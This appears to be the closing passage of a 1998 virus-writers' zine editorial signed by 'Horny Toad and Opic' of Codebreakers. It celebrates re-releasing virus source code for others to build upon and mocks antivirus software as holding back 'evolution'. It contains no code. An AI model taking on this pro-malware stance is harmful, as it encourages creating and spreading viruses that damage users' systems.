code to popular and effective virii available again, for others to learn from
and build upon.  So until next time viewing audience; The computer is a
wonderful microcosm in which man can play god.  Is the AV holding the hands 
of evolution back?  Ask Darwin.

				    - Horny Toad and Opic [Codebreakers '98]